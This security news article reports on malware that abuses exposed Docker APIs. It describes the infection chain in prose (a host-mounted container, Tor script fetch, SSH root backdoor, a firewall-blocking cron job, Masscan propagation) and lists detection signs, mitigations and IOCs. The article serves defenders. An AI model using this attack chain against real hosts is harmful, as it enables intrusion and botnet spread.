New Malware Exploits Exposed Docker APIs to Establish Persistent SSH Root Access

A new strain of malware has been identified in Akamai Hunt’s honeypot infrastructure that targets misconfigured Docker APIs to gain full root access and establish long-term persistence.

First observed in August 2025, this variant diverges significantly from the June 2025 Trend Micro discovery by blocking other attackers’ access, embedding multiple infection tools, and preparing the foundation for a potentially distributed botnet.

Attack Chain and Capabilities

The attack begins with an HTTP POST request to the Docker daemon’s remote API (port 2375), instructing it to spin up an Alpine Linux container with the host’s filesystem mounted.

The container executes a Base64-encoded shell command that installs curl and Tor, fetches a secondary script from a Tor hidden service, and modifies the host’s SSH configuration to permit root login and add a malicious public key for backdoor access.

A cron job is then written to the host’s /etc/crontab, looping through firewall utilities (firewall-cmd, ufw, pfctl, iptables, nft) to block port 2375, effectively locking out any subsequent API requests and ensuring exclusive attacker control.

Once persistence is achieved, the container reports the compromised host to its command-and-control (C2) server over Tor. It downloads and executes a compressed dropper binary, which unpacks a Go-based dropper that embeds additional tools.

After parsing active user sessions via the utmp file, it launches Masscan to search for other exposed Docker APIs on port 2375. Detected hosts are targeted in the same manner, propagating the infection.

Though the binary includes dormant logic for Telnet (port 23) and Chromium remote debugging (port 9222) exploits using default device credentials and the chromedp library, respectively, these routines are not invoked in the current build, indicating planned future expansion.

Detection and Mitigation

Defenders can identify this threat by monitoring for newly created containers that install package managers (apk, apt, yum) followed by immediate use of curl or wget.

Unusual Base64 command execution, Tor-bound connections to .onion domains, and abrupt cessation of services listening on critical ports (2375, 9222, 23) are key indicators.

Additional signs include host-mounted containers accessing /etc or /var/run/docker.sock, and cron entries that manipulate firewall rules.

Mitigation strategies focus on reducing attack surface and enforcing network hygiene:
– Isolate Docker hosts behind internal firewalls and apply network segmentation to limit lateral movement.
– Restrict exposure of the Docker API, Chrome DevTools port, and Telnet service to trusted management networks only.
– Enforce strong credential policies and rotate default passwords on all devices.
– Implement host-based monitoring to alert on unauthorized additions to SSH authorized_keys and changes to crontab.

By combining proactive threat hunting with strict API access controls and segmentation, organizations can neutralize emerging Docker-based threats before they escalate.

IOCs

IOC	Type
wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion	Domain
2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion	Domain
webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207	URL
C38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c – docker-init.sh	Hash
649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 – system	Hash
9451d3dc4b0ff9ea6afa503ffbfcd877944cac0860d6a0b8779c2bb5d03d3446 – dockerd	Hash

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post New Malware Exploits Exposed Docker APIs to Establish Persistent SSH Root Access appeared first on Cyber Security News.